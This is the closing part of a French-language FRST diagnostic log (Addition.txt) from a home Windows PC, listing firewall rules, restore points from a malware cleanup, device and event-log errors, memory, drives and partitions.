[{45B5409A-90B6-4097-B12A-0BF9D2E8B98B}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe FirewallRules: [{F250BA00-6393-4D87-B489-DC04637AC8ED}] => (Allow) C:\Program Files\TeamViewer\TeamViewer.exe FirewallRules: [{1C1CA91E-A835-4CC4-8068-3F0F856BF89B}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe FirewallRules: [{D1E9DDE5-7F4D-4A40-9D1C-2852ABE02275}] => (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe FirewallRules: [{91B315D5-80FF-49E0-8D01-925B6A522112}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\VideoEditor.exe FirewallRules: [{005C3E75-81AD-4573-987B-C71C779A82D2}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\VideoEditor.exe FirewallRules: [{4513B173-8CBB-4F9C-8185-6343BDAD9469}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Activation.exe FirewallRules: [{4FDD5FB9-6A2A-4A4C-B874-5F7CA94EB520}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Activation.exe FirewallRules: [{B2917D93-9485-4EE0-B6A5-29F33BE79A6D}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Updater.exe FirewallRules: [{A5493590-52C1-4F5F-856B-773D601FE8DE}] => (Allow) C:\Program Files\FlashIntegro\VideoEditor\Updater.exe FirewallRules: [{3ABE2541-FA92-4C64-9EDD-810BD78233E2}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609\SZBrowser.exe FirewallRules: [{4261DD07-48CE-4432-8AB1-9779B8998754}] => (Allow) C:\Program Files\iTunes\iTunes.exe FirewallRules: [{318964E2-BC5C-4859-B8A1-4F1DEB1E3D53}] => (Allow) C:\Program Files\Dropbox\Client\Dropbox.exe FirewallRules: [{502A64A7-B088-46DF-906B-0C5631F35077}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.609_0\SZBrowser.exe ==================== Points de restauration ========================= 12-07-2017 08:31:01 Windows Update 12-07-2017 08:53:21 Windows Update 15-07-2017 08:18:19 Avant installation mise à 16-07-2017 08:24:23 Windows Update 20-07-2017 07:17:40 Windows Update 22-07-2017 12:18:38 Avant désinfection 22-07-2017 15:36:48 Revo Uninstaller's restore point - Malwarebytes Anti-Malware version 2.2.1.1043 22-07-2017 15:41:34 Revo Uninstaller's restore point - Microsoft Security Essentials 22-07-2017 15:49:14 Revo Uninstaller's restore point - Java 8 Update 111 22-07-2017 15:49:40 Removed Java 8 Update 111 22-07-2017 15:52:08 Revo Uninstaller's restore point - Bonjour 22-07-2017 15:52:31 Removed Bonjour 22-07-2017 15:54:48 Revo Uninstaller's restore point - Java 8 Update 121 22-07-2017 15:55:06 Removed Java 8 Update 121 22-07-2017 15:58:10 Revo Uninstaller's restore point - Java 8 Update 131 22-07-2017 15:58:26 Removed Java 8 Update 131 22-07-2017 19:45:30 JRT Pre-Junkware Removal ==================== Éléments en erreur du Gestionnaire de périphériques ============= Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Name: Carte de miniport Microsoft Virtual WiFi Description: Carte de miniport Microsoft Virtual WiFi Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: vwifimp Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Erreurs du Journal des événements: ========================= Erreurs Application: ================== Error: (07/22/2017 07:45:39 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer. Details: AddLegacyDriverFiles: Unable to back up image of binary 72E6949A. System Error: Le fichier spécifié est introuvable. . Error: (07/22/2017 05:49:58 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Le filtre d’événement avec la requête « SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99 » n’a pas pu être réactivé dans l’espace de noms « //./root/CIMV2 » à cause de l’erreur 0x80041003. Les événements ne peuvent pas être délivrés à travers ce filtre tant que le problème ne sera pas corrigé. Error: (07/22/2017 04:32:31 PM) (Source: Microsoft Office 12) (EventID: 2000) (User: ) Description: Accepted Safe Mode action : Microsoft Office Outlook. Error: (07/22/2017 04:20:59 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Le filtre d’événement avec la requête « SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99 » n’a pas pu être réactivé dans l’espace de noms « //./root/CIMV2 » à cause de l’erreur 0x80041003. Les événements ne peuvent pas être délivrés à travers ce filtre tant que le problème ne sera pas corrigé. Error: (07/22/2017 03:36:47 PM) (Source: VSS) (EventID: 8194) (User: ) Description: Erreur du service de cliché instantané des volumes : erreur lors de l’interrogation de l’interface IVssWriterCallback. hr = 0x80070005, Accès refusé. . Cette erreur est souvent due à des paramètres de sécurité incorrects dans le processus du rédacteur ou du demandeur. Opération : Données du rédacteur en cours de collecte Contexte : ID de classe du rédacteur: {e8132975-6f93-4464-a53e-1050253ae220} Nom du rédacteur: System Writer ID d’instance du rédacteur: {b333f632-2206-4849-99bd-560b5f35fd97} Error: (07/22/2017 02:46:02 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Le filtre d’événement avec la requête « SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99 » n’a pas pu être réactivé dans l’espace de noms « //./root/CIMV2 » à cause de l’erreur 0x80041003. Les événements ne peuvent pas être délivrés à travers ce filtre tant que le problème ne sera pas corrigé. Error: (07/22/2017 09:34:08 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Le filtre d’événement avec la requête « SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99 » n’a pas pu être réactivé dans l’espace de noms « //./root/CIMV2 » à cause de l’erreur 0x80041003. Les événements ne peuvent pas être délivrés à travers ce filtre tant que le problème ne sera pas corrigé. Error: (07/22/2017 07:25:13 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: La création du contexte d’activation a échoué pour « C:\Program Files\HP\HP ENVY 4500 series\DriverStore\Yeti\V3\amd64\hpinkinsC511.exe ». Assembly dépendant Microsoft.Windows.Common-Controls,language="*",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" introuvable. Utilisez sxstrace.exe pour un diagnostic détaillé. Error: (07/22/2017 07:20:47 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante esu.exe, version : 1.0.0.0, horodatage : 0x5873dbe1 Nom du module défaillant : KERNELBASE.dll, version : 6.1.7601.23775, horodatage : 0x58f4dbfb Code d’exception : 0xe0434352 Décalage d’erreur : 0x0000845d ID du processus défaillant : 0x13a4 Heure de début de l’application défaillante : 0x01d302aa3b9fe495 Chemin d’accès de l’application défaillante : C:\Program Files\Garmin\Express SelfUpdater\esu.exe Chemin d’accès du module défaillant: C:\Windows\system32\KERNELBASE.dll ID de rapport : 845dda5c-6e9d-11e7-9d11-001f16971315 Error: (07/22/2017 07:20:46 AM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Application : esu.exe Version du Framework : v4.0.30319 Description : le processus a été arrêté en raison d'une exception non gérée. Informations sur l'exception : System.TypeLoadException à Garmin.Omt.Express.SelfUpdater.Program.RealMain() à Garmin.Omt.Express.SelfUpdater.Program.Main(System.String[]) Erreurs système: ============= Error: (07/22/2017 08:12:07 PM) (Source: Schannel) (EventID: 4119) (User: AUTORITE NT) Description: L’alerte fatale suivante a été reçue : 20. Error: (07/22/2017 05:47:05 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Le service Expérience d’application s’est arrêté avec l’erreur : Accès refusé. Error: (07/22/2017 05:46:59 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Le service Expérience d’application s’est arrêté avec l’erreur : Accès refusé. Error: (07/22/2017 05:40:24 PM) (Source: DCOM) (EventID: 10000) (User: ) Description: Le démarrage d’un serveur DCOM : {1F87137D-0E7C-44D5-8C73-4EFFB68962F2} n’est pas possible. L’erreur : "5" s’est produite lors du démarrage de la commande : C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding Error: (07/22/2017 05:40:24 PM) (Source: DCOM) (EventID: 10000) (User: ) Description: Le démarrage d’un serveur DCOM : {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} n’est pas possible. L’erreur : "5" s’est produite lors du démarrage de la commande : C:\Windows\system32\wbem\wmiprvse.exe -Embedding Error: (07/22/2017 04:20:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Garmin Device Interaction Service n’a pas pu démarrer en raison de l’erreur : Le service n’a pas répondu assez vite à la demande de lancement ou de contrôle. Error: (07/22/2017 04:20:51 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la connexion du service Garmin Device Interaction Service. Error: (07/22/2017 04:18:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Apple Mobile Device n’a pas pu démarrer en raison de l’erreur : Le canal de communication a été fermé. Error: (07/22/2017 04:17:16 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Le service Service Partage réseau du Lecteur Windows Media s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 30000 millisecondes : Redémarrer le service. Error: (07/22/2017 04:17:16 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Le service Apple Mobile Device s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 60000 millisecondes : Redémarrer le service. CodeIntegrity: =================================== Date: 2017-03-16 00:22:53.580 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume5\Windows\System32\rpcrt4.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2014-08-30 16:32:14.511 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume3\Windows\System32\gdi32.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2014-08-30 16:17:33.681 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume3\Windows\System32\gdi32.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2009-12-23 19:20:21.787 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Acer\Acer PowerSmart Manager\SysHook.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2009-12-23 19:20:21.680 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Acer\Acer PowerSmart Manager\SysHook.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2009-12-23 19:19:02.389 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Acer\Acer PowerSmart Manager\SysHook.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2009-12-23 19:19:02.286 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Acer\Acer PowerSmart Manager\SysHook.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2009-09-22 08:38:55.315 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Acer\Acer PowerSmart Manager\SysHook.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2009-09-22 08:38:55.248 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Acer\Acer PowerSmart Manager\SysHook.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. Date: 2009-09-21 07:52:37.374 Description: Le module d’intégrité du code ne peut pas vérifier l’intégrité image du fichier \Device\HarddiskVolume2\Program Files\Acer\Acer PowerSmart Manager\SysHook.dll car le jeu de hachages d’images par page n’a pas été trouvé sur le système. ==================== Infos Mémoire =========================== Processeur: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz Pourcentage de mémoire utilisée: 52% Mémoire physique - RAM - totale: 3000.83 MB Mémoire physique - RAM - disponible: 1411.18 MB Mémoire virtuelle totale: 5999.99 MB Mémoire virtuelle disponible: 4395.73 MB ==================== Lecteurs ================================ Drive c: (Windows 7) (Fixed) (Total:120.75 GB) (Free:47.38 GB) NTFS ==>[lecteur avec composants d'amorçage (obtenu depuis BCD)] Drive d: (Téléchargements) (Fixed) (Total:50 GB) (Free:32.55 GB) NTFS Drive e: (Mes documents) (Fixed) (Total:54.99 GB) (Free:1.21 GB) NTFS Drive f: (Multimédia) (Fixed) (Total:120.01 GB) (Free:55.94 GB) NTFS Drive z: (Windows 10) (Fixed) (Total:119.99 GB) (Free:71.4 GB) NTFS ==>[système avec composants d'amorçage (obtenu depuis lecteur)] ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (Size: 465.8 GB) (Disk ID: 1B93471F) Partition 1: (Not Active) - (Size=345 GB) - (Type=05) Partition 2: (Not Active) - (Size=120 GB) - (Type=07 NTFS) Partition 3: (Active) - (Size=120.8 GB) - (Type=07 NTFS) ==================== Fin de Addition.txt ============================